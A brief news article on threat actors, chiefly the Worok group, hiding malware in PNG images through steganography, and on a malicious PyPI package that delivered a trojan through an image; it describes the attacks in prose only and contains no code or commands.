New threat actors have been discovered by researchers using PNG files to spread malware.
Since early September 2022, a threat actor going by the name Worok has been observed by both ESET and Avast using this technique.
Worok has apparently been active in the Middle East, Southeast Asia, and South Africa, focusing on high-profile victims like government organisations.
Attack with multiple waves
DLL sideloading is used by the attackers to run the CLRLoader malware, which in turn loads the PNGLoader DLL, which can decipher the obfuscated code buried in PNG files.
The resulting executable is DropBoxControl, a.NET C# information stealer written specifically to exploit Dropbox for illicit communication and data theft. Many operations appear to be supported by this malware, including: running cmd /c, launching an executable, downloading and uploading data to and from Dropbox, erasing data from target endpoints, creating new directories (for additional backdoor payloads), and extracting system information.
Researchers have concluded that Worok is the product of a stealthy cyberespionage group that operates laterally across target networks and steals confidential information. It appears to be using tools that are unique to itself, as the researchers have never seen them employed by any other entity.
Worok, it was said, employs “least significant bit (LSB) encoding,” which hides malicious code in the least significant bits of image pixels.
It would appear that the use of steganography in cybercrime is on the rise. Check Point Research (CPR) recently discovered a malicious package on the Python-based repository PyPI that delivers Trojan malware (opens in new tab) called apicolor via an image. The malware spread primarily through GitHub.
The seemingly safe package downloads an image from the internet, instals additional tools to process the image, and then uses the exec command to activate the processed output.
The judyb code, a steganography add-on that can decipher hidden messages in images, is one of the two necessities. Researchers were then able to trace the origin of the image back to a web downloader that delivered malicious packages to the victim’s endpoint.
Subtly charming pop culture geek. Amateur analyst. Freelance tv buff. Coffee lover